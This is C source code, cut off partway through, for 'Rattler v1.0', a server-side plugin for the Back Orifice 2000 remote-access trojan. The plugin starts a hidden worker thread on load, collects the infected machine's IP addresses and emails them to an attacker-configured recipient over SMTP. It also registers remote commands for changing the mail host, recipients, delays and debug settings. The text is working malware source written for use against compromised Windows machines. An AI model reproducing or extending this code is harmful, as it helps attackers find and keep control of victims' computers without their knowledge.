/*
	Rattler v1.0 <http://wyrmsoft.tzo.net/rattler/>
	Plugin For Back Orifice 2000
	Copyright (c) 1999 by AdTropis <mataru@mail.airmail.net>

	Licensed under the GNU Public License (GPL)
	<http://www.gnu.org/copyleft/gpl.html>
*/

/*
FIXME:
    Add support for SMTP 251 reply on "RCTP TO:"?

Notes:

For Next Version:
    Usage of variables in strings
	(e.g.  Subject="Rattler (%u@%h)" => "CurrentUser@CurrentHost.Domain.Ext")
*/


/* includes */
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/timeb.h>
#include <time.h>
#include <windows.h>

#include <plugins.h>
#include <bocomreg.h>
#include <iohandler.h>
#include <encryption.h>
#include <config.h>

#include "Rattler.h"


/* global variables */
HINSTANCE	g_hInstance;
BOOL		g_bActive;
long		g_nNumThreads;
char		g_zPluginOptions[] =	"<**CFG**>Rattler v1.0\0"
									"B:"			CFG_RUNLOADED		"=1\0"
									"N[5,999]:"		CFG_QUERYDELAY		"=30\0\0"
									"S[64]:"		CFG_MAILHOST		"=mail.hotmail.com\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0"
									"N[0,65535]:"	CFG_MAILPORT		"=25\0\0\0\0"
									"S[64]:"		CFG_MAILFROM		"=Rattled@smtp.host.com\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0"
									"S[64]:"		CFG_RCPTTO			"=Rattler@smtp.host.com\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0"
									"S[64]:"		CFG_SUBJECT			"=Rattler Information\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0"
									"N[0,999]:"		CFG_RETRIES			"=10\0\0"
									"N[0,999]:"		CFG_RETRYDELAY		"=60\0\0"
									"B:"			CFG_NOTIFYSTARTUP	"=1\0"
									"B:"			CFG_NOTIFYLOCAL		"=0\0"
									"B:"			CFG_USEDEBUG		"=0\0"
									"S[64]:"		CFG_DEBUGFILE		"=C:\\WINDOWS\\SYSTEM\\RATTLER.LOG\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0"
									;

/* command handles */
int			g_nCmdStatus;
int			g_nCmdShowConfig;
int			g_nCmdChangeStatus;
int			g_nCmdChangeHost;
int			g_nCmdChangeUsers;
int			g_nCmdChangeSubject;
int			g_nCmdChangeOpts;
int			g_nCmdChangeDelays;
int			g_nCmdChangeDebug;


/* counters */
int			g_nCntSentMsgs;
int			g_nCntAttemptMsgs;


/* configuration variables */
BOOL		cg_bCfgRunOnLoad;
DWORD		cg_nCfgQueryDelay;
char *		cg_zCfgMailHost;
DWORD		cg_nCfgMailPort;
char *		cg_zCfgMailFrom;
char *		cg_zCfgRcptTo;
char *		cg_zCfgSubject;
DWORD		cg_nCfgRetries;
DWORD		cg_nCfgRetryDelay;
BOOL		cg_bCfgNotifyStartup;
BOOL		cg_bCfgNotifyLocal;
BOOL		cg_bCfgUseDebug;
char *		cg_zCfgDebugFile;


/* linkage variables */
CEncryptionHandler *				EncryptionHandler			= NULL;
CIOHandler *						IOHandler					= NULL;
TYPEOF_RegisterCommand *			RegisterCommand				= NULL;
TYPEOF_UnregisterCommand *			UnregisterCommand			= NULL;
TYPEOF_RegisterClientMenu *			RegisterClientMenu			= NULL;
TYPEOF_UnregisterClientMenu *		UnregisterClientMenu		= NULL;
TYPEOF_IssueAuthCommandRequest *	IssueAuthCommandRequest		= NULL;
TYPEOF_IssueAuthCommandReply *		IssueAuthCommandReply		= NULL;
TYPEOF_ConnectAuthSocket *			ConnectAuthSocket			= NULL;
TYPEOF_ListenAuthSocket *			ListenAuthSocket			= NULL;
TYPEOF_InteractiveConnect *			InteractiveConnect			= NULL;
TYPEOF_InteractiveListen *			InteractiveListen			= NULL;


/* function prototypes */
/* command handlers */
int				CmdStatus( CAuthSocket *, int, DWORD, char *, char * );
int				CmdShowConfig( CAuthSocket *, int, DWORD, char *, char * );
int				CmdChangeStatus( CAuthSocket *, int, DWORD, char *, char * );
int				CmdChangeHost( CAuthSocket *, int, DWORD, char *, char * );
int				CmdChangeUsers( CAuthSocket *, int, DWORD, char *, char * );
int				CmdChangeSubject( CAuthSocket *, int, DWORD, char *, char * );
int				CmdChangeOpts( CAuthSocket *, int, DWORD, char *, char * );
int				CmdChangeDelays( CAuthSocket *, int, DWORD, char *, char * );
int				CmdChangeDebug( CAuthSocket *, int, DWORD, char *, char * );
BOOL			CkBoolStr( char *, BOOL, char *, char * );


/* worker functions */
int				LoadConfig( void );
LONG			ReadKeyStr( HKEY, char *, char ** );
LONG			ReadKeyNum( HKEY, char *, DWORD * );
LONG			ReadKeyBool( HKEY, char *, BOOL * );
int				SaveConfig( void );
DWORD WINAPI	WorkerThread( LPVOID );
IPINFO **		GetIpList( void );
int				GetNumAddr( char ** );
int				ValidateIp( IPINFO * );
int				FindIp( IPINFO *, IPINFO ** );
int				XmitMailMessage( IPINFO ** );
int				SendMailMessage( SOCKET, IPINFO ** );
int				SendString( SOCKET, char *, ... );
int				RecvString( SOCKET, char * );
void			LogMsg( char *, ... );
void			Delay( DWORD );



#pragma comment(linker,"/section:.rdata,RW")
#pragma comment(linker,"/section:.data,RW")



/* DllMain() */
BOOL WINAPI
DllMain( HINSTANCE hInstance, ULONG ulReasonForCall, LPVOID lpReserved ) {
	switch( ulReasonForCall ) {
		case DLL_PROCESS_ATTACH:
			g_hInstance = hInstance;
			break;
	}

	return( TRUE );
}


/* InstallPlugin() */
BOOL
InstallPlugin( PLUGIN_LINKAGE pl ) {
	DWORD	nThreadID;


	g_bActive					= FALSE;
	g_nNumThreads				= 0;

	EncryptionHandler			= pl.pEncryptionHandler;
	IOHandler					= pl.pIOHandler;
	RegisterCommand				= pl.pRegisterCommand;
	UnregisterCommand			= pl.pUnregisterCommand;
	IssueAuthCommandRequest		= pl.pIssueAuthCommandRequest;
	IssueAuthCommandReply		= pl.pIssueAuthCommandReply;
	ConnectAuthSocket			= pl.pConnectAuthSocket;
	ListenAuthSocket			= pl.pListenAuthSocket;
	RegisterClientMenu			= pl.pRegisterClientMenu;
	UnregisterClientMenu		= pl.pUnregisterClientMenu;
	InteractiveListen			= pl.pInteractiveListen;
	InteractiveConnect			= pl.pInteractiveConnect;

	if( RegisterClientMenu ) {
		MessageBox( NULL, "Rattler v1.0 is a server only plugin", "Rattler: Error", MB_ICONERROR );
		return( FALSE );
	}

	LoadConfig();

	LogMsg( "Rattler v1.0 Plugin: Startup..." );
	LogMsg( "Configuration loaded" );

	LogMsg( "Registering commands" );
	if( RegisterCommand ) {
		g_nCmdStatus		= RegisterCommand( CmdStatus, "Rattler", "Status", NULL, "Send Mail Message (yes/no)", NULL );
		g_nCmdShowConfig	= RegisterCommand( CmdShowConfig, "Rattler", "Configuration", NULL, "Load Default Config (yes/no)", NULL );
		g_nCmdChangeStatus	= RegisterCommand( CmdChangeStatus, "Rattler", "Config: Status", NULL, "Status (online/offline)", "Run When Loaded (yes/no)" );
		g_nCmdChangeHost	= RegisterCommand( CmdChangeHost, "Rattler", "Config: Host", "Port", "Mail Host", NULL );
		g_nCmdChangeUsers	= RegisterCommand( CmdChangeUsers, "Rattler", "Config: Users", NULL, "Mail From", "Rcpt To");
		g_nCmdChangeSubject	= RegisterCommand( CmdChangeSubject, "Rattler", "Config: Subject", NULL, "Subject", NULL );
		g_nCmdChangeOpts	= RegisterCommand( CmdChangeOpts, "Rattler", "Config: Options", "Retries", "Notify Startup (yes/no)", "Notify Local (yes/no)" );
		g_nCmdChangeDelays	= RegisterCommand( CmdChangeDelays, "Rattler", "Config: Delays", "Retry Delay (secs)", "Query Delay (secs)", NULL );
		g_nCmdChangeDebug	= RegisterCommand( CmdChangeDebug, "Rattler", "Config: Debug", NULL, "Use Debugging (yes/no)", "Debug File" );
	}
	LogMsg( "Commands registered" );

	// Only start the worker thread if the configuration allows
	if( TRUE == cg_bCfgRunOnLoad ) {
		LogMsg( "Startup: Activating worker thread" );
		g_bActive = TRUE;
		CreateThread( NULL, 0, WorkerThread, 0, 0, &nThreadID );
	} else
		LogMsg( "Startup: Thread not activated" );

	return( TRUE );
}


/* TerminatePlugin() */
void
TerminatePlugin( void ) {
	int	rc;


	LogMsg( "Terminate message received, waiting for thread to terminate" );

	g_bActive = FALSE;
	while( g_nNumThreads > 0 )
		Sleep( 0 );

	LogMsg( "Thread terminated" );

	LogMsg( "Unregistering commands" );
	if( UnregisterCommand ) {
		UnregisterCommand( g_nCmdStatus );
		UnregisterCommand( g_nCmdShowConfig );
		UnregisterCommand( g_nCmdChangeStatus );
		UnregisterCommand( g_nCmdChangeHost );
		UnregisterCommand( g_nCmdChangeUsers );
		UnregisterCommand( g_nCmdChangeSubject );
		UnregisterCommand( g_nCmdChangeOpts );
		UnregisterCommand( g_nCmdChangeDelays );
		UnregisterCommand( g_nCmdChangeDebug );
	}
	LogMsg( "Commands unregistered" );

	LogMsg( "Saving configuration" );
	rc = SaveConfig();
	if( rc != 0 )
		LogMsg( "Error: Error saving configuration" );
	else
		LogMsg( "Configuration saved" );

	LogMsg( "Rattle Terminated" );
	LogMsg( "" );

	return;
}


/* Plugin Version */
BOOL
PluginVersion( PLUGIN_VERSION * ppv ) {
	ppv-> svFilename	= "Rattler.dll";
	ppv-> svDescription	= "Rattler v1.0 for Back Orifice 2000";
	ppv-> wVersionHi	= 1;
	ppv-> wVersionLo	= 0;
	ppv-> wBOVersionHi	= 1;
	ppv-> wBOVersionLo	= 0;

	return( TRUE );
}


/* Command Handlers */
int
CmdStatus( CAuthSocket * cas, int comid, DWORD nArg1, char * zArg2, char * zArg3 ) {
	int			e;
	BOOL		bSendMail;
	BOOL		bActive;
	char		zBuffer[SIZE_BUFFER + 1];
	IPINFO **	pIPInfo;


	pIPInfo = GetIpList();

	bSendMail = CkBoolStr( zArg2, FALSE, "yes", "no" );
	if( TRUE == bSendMail ) {
		LogMsg( "Attempting to send e-mail message (by request)" );
		IssueAuthCommandReply( cas, comid, 0, "Rattler: Attempting to send e-mail message\r\n" );

		// XmitMailMessage() fails if g_bActive is FALSE
		bActive = g_bActive;
		g_bActive = TRUE;
		e = XmitMailMessage( pIPInfo );
		g_bActive = bActive;

		if( 0 == e ) {
			LogMsg( "Attempt succeeded, mail message sent" );
			IssueAuthCommandReply( cas, comid, 0, "Rattler: Mail message sent successfully\r\n" );
		} else {
			LogMsg( "Attempt failed (%d)", e );
			IssueAuthCommandReply( cas, comid, 0, "Rattler: Error: Error sending mail message\r\n" );
		}

		return( 0 );
	}

	sprintf( zBuffer, "Rattler Status: %s\r\n", ( TRUE == g_bActive ? "ONLINE" : "OFFLINE" ) );
	IssueAuthCommandReply( cas, comid, 0, zBuffer );

	sprintf( zBuffer, "   Message Attempts: %d\r\n", g_nCntAttemptMsgs );
	IssueAuthCommandReply( cas, comid, 0, zBuffer );

	sprintf( zBuffer, "   Messages Sent:    %d\r\n", g_nCntSentMsgs );
	IssueAuthCommandReply( cas, comid, 0, zBuffer );

	IssueAuthCommandReply( cas, comid, 0, "Current IP Address block:\r\n" );
	if( pIPInfo != NULL ) {
		for( e = 0; pIPInfo[e] != NULL; e++ ) {
			sprintf( zBuffer, "      %02d: %d.%d.%d.%d\r\n", e,
				     pIPInfo[e]-> pIpAddress[0], pIPInfo[e]-> pIpAddress[1],
					 pIPInfo[e]-> pIpAddress[2], pIPInfo[e]-> pIpAddress[3] );
			IssueAuthCommandReply( cas, comid, 0, zBuffer );
		}
	} else
		IssueAuthCommandReply( cas, comid, 0, "*** NO IP INFORMATION ***\r\n" );

	return( 0 );
}


int
CmdShowConfig( CAuthSocket * cas, int comid, DWORD nArg1, char * zArg2, char * zArg3 ) {
	BOOL	bLoadConfig;
	char	zBuffer[SIZE_BUFFER + 1];


	bLoadConfig = CkBoolStr( zArg2, FALSE, "yes", "no" );
	if( TRUE == bLoadConfig ) {
		LogMsg( "Loading default configuration (by request)" );
		if( cg_zCfgMailHost )	delete [] cg_zCfgMailHost;
		if( cg_zCfgMailFrom )	delete [] cg_zCfgMailFrom;
		if( cg_zCfgRcptTo )		delete [] cg_zCfgRcptTo;
		if( cg_zCfgSubject )	delete [] cg_zCfgSubject;
		if( cg_zCfgDebugFile )	delete [] cg_zCfgDebugFile;

		cg_bCfgRunOnLoad		= GetCfgBool( g_zPluginOptions, CFG_RUNLOADED );
		cg_nCfgQueryDelay		= GetCfgNum( g_zPluginOptions, CFG_QUERYDELAY );
		cg_zCfgMailHost			= _strdup( GetCfgStr( g_zPluginOptions, CFG_MAILHOST ) );
		cg_nCfgMailPort			= GetCfgNum( g_zPluginOptions, CFG_MAILPORT );
		cg_zCfgMailFrom			= _strdup( GetCfgStr( g_zPluginOptions, CFG_MAILFROM ) );
		cg_zCfgRcptTo			= _strdup( GetCfgStr( g_zPluginOptions, CFG_RCPTTO ) );
		cg_zCfgSubject			= _strdup( GetCfgStr( g_zPluginOptions, CFG_SUBJECT ) );
		cg_nCfgRetries			= GetCfgNum( g_zPluginOptions, CFG_RETRIES );
		cg_nCfgRetryDelay		= GetCfgNum( g_zPluginOptions, CFG_RETRYDELAY );
		cg_bCfgNotifyStartup	= GetCfgBool( g_zPluginOptions, CFG_NOTIFYSTARTUP );
		cg_bCfgNotifyLocal		= GetCfgBool( g_zPluginOptions, CFG_NOTIFYLOCAL );
		cg_bCfgUseDebug			= GetCfgBool( g_zPluginOptions, CFG_USEDEBUG );
		cg_zCfgDebugFile		= _strdup( GetCfgStr( g_zPluginOptions, CFG_DEBUGFILE ) );

		SaveConfig();

		LogMsg( "Default configuration loaded" );
		IssueAuthCommandReply( cas, comid, 0, "Ratter: Default configuration loaded\r\n" );

		return( 0 );
	}

	IssueAuthCommandReply( cas, comid, 0, "Rattler Configuration:\r\n" );

	sprintf( zBuffer, "   Run On Load:    %s\r\n", ( TRUE == cg_bCfgRunOnLoad ? "TRUE" : "FALSE" ) );
	IssueAuthCommandReply( cas, comid, 0, zBuffer );

	sprintf( zBuffer, "   Query Delay:    %d\r\n", cg_nCfgQueryDelay );
	IssueAuthCommandReply( cas, comid, 0, zBuffer );

	sprintf( zBuffer, "   Mail Host:      %s\r\n", cg_zCfgMailHost );
	IssueAuthCommandReply( cas, comid, 0, zBuffer );

	sprintf( zBuffer, "   Mail Port:      %d\r\n", cg_nCfgMailPort );
	IssueAuthCommandReply( cas, comid, 0, zBuffer );

	sprintf( zBuffer, "   Mail From:      %s\r\n", cg_zCfgMailFrom );
	IssueAuthCommandReply( cas, comid, 0, zBuffer );

	sprintf( zBuffer, "   Rcpt To:        %s\r\n", cg_zCfgRcptTo );
	IssueAuthCommandReply( cas, comid, 0, zBuffer );

	sprintf( zBuffer, "   Subject:        %s\r\n", cg_zCfgSubject );
	IssueAuthCommandReply( cas, comid, 0, zBuffer );

	sprintf( zBuffer, "   Retries:        %d\r\n", cg_nCfgRetries );
	IssueAuthCommandReply( cas, comid, 0, zBuffer );

	sprintf( zBuffer, "   Retry Delay:    %d\r\n", cg_nCfgRetryDelay );
	IssueAuthCommandReply( cas, comid, 0, zBuffer );

	sprintf( zBuffer, "   Notify Startup: %s\r\n", ( TRUE == cg_bCfgNotifyStartup ? "TRUE" : "FALSE" ) );
	IssueAuthCommandReply( cas, comid, 0, zBuffer );

	sprintf( zBuffer, "   Notify Local:   %s\r\n", ( TRUE == cg_bCfgNotifyLocal ? "TRUE" : "FALSE" ) );
	IssueAuthCommandReply( cas, comid, 0, zBuffer );

	sprintf( zBuffer, "   Debug Enabled:  %s\r\n", ( TRUE == cg_bCfgUseDebug ? "TRUE" : "FALSE" ) );
	IssueAuthCommandReply( cas, comid, 0, zBuffer );

	sprintf( zBuffer, "   Debug File:     %s\r\n", cg_zCfgDebugFile );
	IssueAuthCommandReply( cas, comid, 0, zBuffer );

	return( 0 );
}


int
CmdChangeStatus( CAuthSocket * cas, int comid, DWORD nArg1, char * zArg2, char * zArg3 ) {
	BOOL	fValStatus	= TRUE;
	BOOL	fValRunLoad	= TRUE;
	DWORD	nThreadID;
	char	zBuffer[SIZE_BUFFER + 1];


	fValStatus	= CkBoolStr( zArg2, g_bActive, "online", "offline" );
	fValRunLoad	= CkBoolStr( zArg3, cg_bCfgRunOnLoad, "yes", "no" );

	if( fValStatus != g_bActive ) {
		if( fValStatus ) {
			sprintf( zBuffer, "Rattler: Starting service..." );
			IssueAuthCommandReply( cas, comid, 0, zBuffer );

			g_bActive = TRUE;
			CreateThread( NULL, 0, WorkerThread, 0, 0, &nThreadID );

			sprintf( zBuffer, " done.\r\n" );
			IssueAuthCommandReply( cas, comid, 0, zBuffer );

			LogMsg( "Remote: Activating worker thread" );
		} else {
			sprintf( zBuffer, "Rattler: Stopping service..." );
			IssueAuthCommandReply( cas, comid, 0, zBuffer );

			g_bActive = FALSE;
			while( g_nNumThreads > 0 )
				Sleep( 0 );

			sprintf( zBuffer, " done.\r\n" );
			IssueAuthCommandReply( cas, comid, 0, zBuffer );

			LogMsg( "Remote: Terminating worker thread" );
		}
	}

	if( fValRunLoad != cg_bCfgRunOnLoad ) {
		LogMsg( "Config: Run OnLoad:     %s -> %s", ( TRUE == cg_bCfgRunOnLoad ? "TRUE" : "FALSE" ),
			    ( TRUE == fValRunLoad ? "TRUE" : "FALSE" ) );

		sprintf( zBuffer, "Rattler: Run On Load:    %s -> %s\r\n", ( TRUE == cg_bCfgRunOnLoad ? "TRUE" : "FALSE" ),
			              ( TRUE == fValRunLoad ? "TRUE" : "FALSE" ) );

		IssueAuthCommandReply( cas, comid, 0, zBuffer );
		cg_bCfgRunOnLoad = fValRunLoad;
	}

	SaveConfig();

	return( 0 );
}


int
CmdChangeHost( CAuthSocket * cas, int comid, DWORD nArg1, char * zArg2, char * zArg3 ) {
	char	zBuffer[SIZE_BUFFER + 1];


	if( nArg1 > 0 && nArg1 != cg_nCfgMailPort ) {
		LogMsg( "Config: Mail Port:      %d -> %d", cg_nCfgMailPort, nArg1 );

		sprintf( zBuffer, "Rattler: Mail Port:      %d -> %d\r\n", cg_nCfgMailPort, nArg1 );
		IssueAuthCommandReply( cas, comid, 0, zBuffer );
		cg_nCfgMailPort = nArg1;
	}

	if( lstrlen( zArg2 ) > 0 && lstrcmp( zArg2, cg_zCfgMailHost )  ) {
		LogMsg( "Config: Mail Host:      %s -> %s", cg_zCfgMailHost, zArg2 );

		sprintf( zBuffer, "Rattler: Mail Host:      %s -> %s\r\n", cg_zCfgMailHost, zArg2 );
		IssueAuthCommandReply( cas, comid, 0, zBuffer );
		if( cg_zCfgMailHost != NULL )	delete [] cg_zCfgMailHost;
		cg_zCfgMailHost = _strdup( zArg2 );
	}

	SaveConfig();

	return( 0 );
}


int
CmdChangeUsers( CAuthSocket * cas, int comid, DWORD nArg1, char * zArg2, char * zArg3 ) {
	char	zBuffer[SIZE_BUFFER + 1];


	if( lstrlen( zArg2 ) > 0 && lstrcmp( zArg2, cg_zCfgMailFrom ) ) {
		LogMsg( "Config: Mail From:      %s -> %s", cg_zCfgMailFrom, zArg2 );

		sprintf( zBuffer, "Rattler: Mail From:      %s -> %s\r\n", cg_zCfgMailFrom, zArg2 );
		IssueAuthCommandReply( cas, comid, 0, zBuffer );
		if( cg_zCfgMailFrom != NULL )	delete [] cg_zCfgMailFrom;
		cg_zCfgMailFrom = _strdup( zArg2 );
	}

	if( lstrlen( zArg3 ) > 0 && lstrcmp( zArg3, cg_zCfgRcptTo ) ) {
		LogMsg( "Config: Rcpt To:        %s -> %s", cg_zCfgRcptTo, zArg3 );

		sprintf( zBuffer, "Rattler: Rcpt To:        %s -> %s\r\n", cg_zCfgRcptTo, zArg3 );
		IssueAuthCommandReply( cas, comid, 0, zBuffer );
		if( cg_zCfgRcptTo != NULL )	delete [] cg_zCfgRcptTo;
		cg_zCfgRcptTo = _strdup( zArg3 );
	}

	SaveConfig();

	return( 0 );
}


int
CmdChangeSubject( CAuthSocket * cas, int comid, DWORD nArg1, char * zArg2, char * zArg3 ) {
	char	zBuffer[SIZE_BUFFER + 1];


	if( lstrlen( zArg2 ) > 0 && lstrcmp( zArg2, cg_zCfgSubject ) ) {
		LogMsg( "Config: Subject:        %s -> %s", cg_zCfgSubject, zArg2 );

		sprintf( zBuffer, "Rattler: Subject:        %s -> %s\r\n", cg_zCfgSubject, zArg2 );
		IssueAuthCommandReply( cas, comid, 0, zBuffer );
		if( cg_zCfgSubject != NULL )	delete [] cg_zCfgSubject;
		cg_zCfgSubject = _strdup( zArg2 );
	}

	SaveConfig();

	return( 0 );
}


int
CmdChangeOpts( CAuthSocket * cas, int comid, DWORD nArg1, char * zArg2, char * zArg3 ) {
	BOOL	fValStartup	= TRUE;
	BOOL	fValLocal	= FALSE;
	char	zBuffer[SIZE_BUFFER + 1];


	fValStartup	= CkBoolStr( zArg2, cg_bCfgNotifyStartup, "yes", "no" );
	fValLocal	= CkBoolStr( zArg3, cg_bCfgNotifyLocal, "yes", "no" );

	if( nArg1 > 0 && nArg1 != cg_nCfgRetries ) {
		LogMsg(	"Config: Retries:        %d -> %d", cg_nCfgRetries, nArg1 );

		sprintf( zBuffer, "Rattler: Retries:        %d -> %d\r\n", cg_nCfgRetries, nArg1 );
		IssueAuthCommandReply( cas, comid, 0, zBuffer );
		cg_nCfgRetries = nArg1;
	}

	if( fValStartup != cg_bCfgNotifyStartup ) {
		LogMsg( "Config: Notify Startup: %s -> %s", ( TRUE == cg_bCfgNotifyStartup ? "TRUE" : "FALSE" ),
			    ( TRUE == fValStartup ? "TRUE" : "FALSE" ) );

		sprintf( zBuffer, "Rattler: Notify Startup: %s -> %s\r\n", ( TRUE == cg_bCfgNotifyStartup ? "TRUE" : "FALSE" ),
			              ( TRUE == fValStartup ? "TRUE" : "FALSE" ) );
		IssueAuthCommandReply( cas, comid, 0, zBuffer );
		cg_bCfgNotifyStartup = fValStartup;
	}

	if( fValLocal != cg_bCfgNotifyLocal ) {
		LogMsg( "Config: Notify Local:   %s -> %s", ( TRUE == cg_bCfgNotifyLocal ? "TRUE" : "FALSE" ),
			    ( TRUE == fValLocal ? "TRUE" : "FALSE" ) );

		sprintf( zBuffer, "Rattler: Notify Local:   %s -> %s\r\n", ( TRUE == cg_bCfgNotifyLocal ? "TRUE" : "FALSE" ),
			              ( TRUE == fValLocal ? "TRUE" : "FALSE" ) );
		IssueAuthCommandReply( cas, comid, 0, zBuffer );
		cg_bCfgNotifyLocal = fValLocal;
	}

	SaveConfig();

	return( 0 );
}

int
CmdChangeDelays( CAuthSocket * cas, int comid, DWORD nArg1, char * zArg2, char * zArg3 ) {
	DWORD	nTemp;
	char	zBuffer[SIZE_BUFFER + 1];


	if( nArg1 > 0 && nArg1 != cg_nCfgRetryDelay ) {
		LogMsg(	"Config: Retry Delay:    %d -> %d", cg_nCfgRetryDelay, nArg1 );

		sprintf( zBuffer, "Rattler: Retry Delay:    %d -> %d\r\n", cg_nCfgRetryDelay, nArg1 );
		IssueAuthCommandReply( cas, comid, 0, zBuffer );
		cg_nCfgRetryDelay = nArg1;
	}

	if( lstrlen( zArg2 ) > 0 ) {
		nTemp = atol( zArg2 );
		if( nTemp >= 5 && nTemp <= 999 && nTemp != cg_nCfgQueryDelay ) {
			LogMsg(	"Config: Query Delay:    %d -> %d", cg_nCfgQueryDelay, nTemp );

			sprintf( zBuffer, "Rattler: Query Delay:    %d -> %d\r\n", cg_nCfgQueryDelay, nTemp );
			IssueAuthCommandReply( cas, comid, 0, zBuffer );
			cg_nCfgQueryDelay = nTemp;
		}
	}

	return( 0 );
}

int
CmdChangeDebug( CAuthSocket * cas, int comid, DWORD nArg1, char * zArg2, char * zArg3 ) {
	BOOL	fValDebug	= FALSE;
	char	zBuffer[SIZE_BUFFER + 1];


	fValDebug	= CkBoolStr( zArg2, cg_bCfgUseDebug, "yes", "no" );

	if( fValDebug != cg_bCfgUseDebug ) {
		LogMsg( "Config: Debug Enabled:  %s -> %s", ( TRUE == cg_bCfgUseDebug ? "TRUE" : "FALSE" ),
			    ( TRUE == fValDebug ? "TRUE" : "FALSE" ) );

		sprintf( zBuffer, "Rattler: Debug Enabled:  %s -> %s\r\n", ( TRUE == cg_bCfgUseDebug ? "TRUE" : "FALSE" ),
			( TRUE == fValDebug ? "TRUE" : "FALSE" ) );
		IssueAuthCommandReply( cas, comid, 0, zBuffer );
		cg_bCfgUseDebug = fValDebug;
	}

	if( lstrlen( zArg3 ) > 0 && lstrcmp( zArg3, cg_zCfgDebugFile ) ) {
		LogMsg( "Config: Debug File:     %s -> %s", cg_zCfgDebugFile, zArg3 );

		sprintf( zBuffer, "Rattler: Debug File:     %s -> %s\r\n", cg_zCfgDebugFile, zArg3 );
		IssueAuthCommandReply( cas, comid, 0, zBuffer );
		if( cg_zCfgDebugFile != NULL )	delete [] cg_zCfgDebugFile;
		cg_zCfgDebugFile = _strdup( zArg3 );
	}

	SaveConfig();

	return( 0 );
}


/*
    CkBoolStr()
	Helper Function
	Checks a string vs two choices and returns TRUE or FALSE depending upon
	outcome.  If the check string is neither the TRUE or FALSE value, a default
	value is returned.
*/
BOOL
CkBoolStr( char * zCkBuffer, BOOL bDefault, char * zTrue, char * zFalse ) {
	if( 0 == lstrcmpi( zCkBuffer, zTrue ) )
		return( TRUE );

	if( 0 == lstrcmpi( zCkBuffer, zFalse ) )
		return( FALSE );

	return( bDefault );
}


/*
    LoadConfig()
	Loads the configuration set from registry or from the default values.
*/
int
LoadConfig( void ) {
	LONG	lrc;
	DWORD	nDisp;
	HKEY	hKey;


	cg_bCfgRunOnLoad		= GetCfgBool( g_zPluginOptions, CFG_RUNLOADED );
	cg_nCfgQueryDelay		= GetCfgNum( g_zPluginOptions, CFG_QUERYDELAY );
	cg_zCfgMailHost			= _strdup( GetCfgStr( g_zPluginOptions, CFG_MAILHOST ) );
	cg_nCfgMailPort			= GetCfgNum( g_zPluginOptions, CFG_MAILPORT );
	cg_zCfgMailFrom			= _strdup( GetCfgStr( g_zPluginOptions, CFG_MAILFROM ) );
	cg_zCfgRcptTo			= _strdup( GetCfgStr( g_zPluginOptions, CFG_RCPTTO ) );
	cg_zCfgSubject			= _strdup( GetCfgStr( g_zPluginOptions, CFG_SUBJECT ) );
	cg_nCfgRetries			= GetCfgNum( g_zPluginOptions, CFG_RETRIES );
	cg_nCfgRetryDelay		= GetCfgNum( g_zPluginOptions, CFG_RETRYDELAY );
	cg_bCfgNotifyStartup	= GetCfgBool( g_zPluginOptions, CFG_NOTIFYSTARTUP );
	cg_bCfgNotifyLocal		= GetCfgBool( g_zPluginOptions, CFG_NOTIFYLOCAL );
	cg_bCfgUseDebug			= GetCfgBool( g_zPluginOptions, CFG_USEDEBUG );
	cg_zCfgDebugFile		= _strdup( GetCfgStr( g_zPluginOptions, CFG_DEBUGFILE ) );

	lrc = RegCreateKeyEx( HKEY_LOCAL_MACHINE, KEY_REG_SUBKEY, 0, NULL, REG_OPTION_NON_VOLATILE,
		                  KEY_ALL_ACCESS, NULL, &hKey, &nDisp );

	if( lrc != ERROR_SUCCESS )
		return( -1 );

	ReadKeyBool( hKey, KEY_RUNLOADED, &cg_bCfgRunOnLoad );
	ReadKeyNum( hKey, KEY_QUERYDELAY, &cg_nCfgQueryDelay );
	ReadKeyStr( hKey, KEY_MAILHOST, &cg_zCfgMailHost );
	ReadKeyNum( hKey, KEY_MAILPORT, &cg_nCfgMailPort );
	ReadKeyStr( hKey, KEY_MAILFROM, &cg_zCfgMailFrom );
	ReadKeyStr( hKey, KEY_RCPTTO, &cg_zCfgRcptTo );
	ReadKeyStr( hKey, KEY_SUBJECT, &cg_zCfgSubject );
	ReadKeyNum( hKey, KEY_RETRIES, &cg_nCfgRetries );
	ReadKeyNum( hKey, KEY_RETRYDELAY, &cg_nCfgRetryDelay );
	ReadKeyBool( hKey, KEY_NOTIFYSTARTUP, &cg_bCfgNotifyStartup );
	ReadKeyBool( hKey, KEY_NOTIFYLOCAL, &cg_bCfgNotifyLocal );
	ReadKeyBool( hKey, KEY_USEDEBUG, &cg_bCfgUseDebug );
	ReadKeyStr( hKey, KEY_DEBUGFILE, &cg_zCfgDebugFile );

	return( 0 );
}


/*
    ReadKeyStr()
	Helper Function
	Reads a string key from the registry
*/
LONG
ReadKeyStr( HKEY hKey, char * zKeyName, char ** pzBuffer ) {
	BYTE	zBuffer[SIZE_CFGSTR + 1];
	LONG	lrc;
	DWORD	nSize;


	nSize = SIZE_CFGSTR;
	lrc = RegQueryValueEx( hKey, zKeyName, 0, NULL, (BYTE *) zBuffer, &nSize );
	if( ERROR_SUCCESS == lrc ) {
		if( (*pzBuffer) != NULL )	delete [] (*pzBuffer);
		(*pzBuffer) = _strdup( (char *) zBuffer );
	}

	return( lrc );
}


/*
    ReadKeyNum()
	Helper Function
	Reads a number key from the registry
*/
LONG
ReadKeyNum( HKEY hKey, char * zKeyName, DWORD * pnDword ) {
	LONG	lrc;
	DWORD	nSize;

	
	nSize = sizeof( DWORD );
	lrc = RegQueryValueEx( hKey, zKeyName, 0, NULL, (BYTE *) pnDword, &nSize );

	return( lrc );
}


/*
    ReadKeyBool()
	Helper Function
	Reads a boolean key from the registry
*/
LONG
ReadKeyBool( HKEY hKey, char * zKeyName, BOOL * pbBool ) {
	LONG	lrc;
	DWORD	nSize;

	
	nSize = sizeof( BOOL );
